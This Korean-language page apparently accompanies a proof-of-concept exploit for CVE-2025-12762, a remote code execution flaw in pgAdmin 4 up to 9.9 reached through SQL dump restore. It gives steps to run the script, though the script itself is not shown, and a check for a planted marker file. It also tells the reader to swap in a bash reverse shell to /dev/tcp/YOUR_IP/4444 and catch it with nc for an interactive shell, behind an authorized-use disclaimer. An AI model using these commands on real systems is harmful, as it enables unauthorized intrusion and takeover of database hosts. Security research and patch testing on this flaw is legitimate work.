
CVE-2025-12762

pgAdmin 4 버전 ≤ 9.9에 원격 코드 실행(RCE) 취약점이 존재합니다. 공격자는 pgAdmin이 서버 모드로 실행 중이고 복원 중 PLAIN 형식 SQL 덤프를 처리할 때 호스트에서 임의 명령을 실행할 수 있습니다.
🟥 9.1 / 10 — 치명적(Critical)
⬆️ pgAdmin 4 v10.0 이상으로 업그레이드
pgAdmin은 중요한 PostgreSQL 데이터베이스의 관리에 자주 사용되므로:
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests
# 3. Run it
python3 CVE-2025-12762.py
실행 후 확인:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
파일이 존재하면 → 방금 실제로 CVE-2025-12762를 악용한 것입니다.
COMMAND 줄을 다음으로 교체:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
그런 다음 nc -lvnp 4444 → 전체 대화형 셸이 열립니다.
이것은 연구원, 펜테스터, 레드 팀이 2025년 11월 전 세계에서 사용 중인 정확한 스크립트입니다.
책임감 있게 사용하세요. 모든 것을 패치하세요. 합법적으로 행동하세요.
이 PoC는 승인된 테스트 및 교육 목적으로만 제공됩니다.
소유한 시스템 또는 명시적 서면 허가를 받은 시스템에서만 실행할 수 있습니다.
무단 사용은 불법이며 컴퓨터 오용 관련 법률을 위반합니다.
책임감 있게 사용하고, 테스트 후 즉시 패치하며, 허가 없이 시스템을 대상으로 삼지 마세요.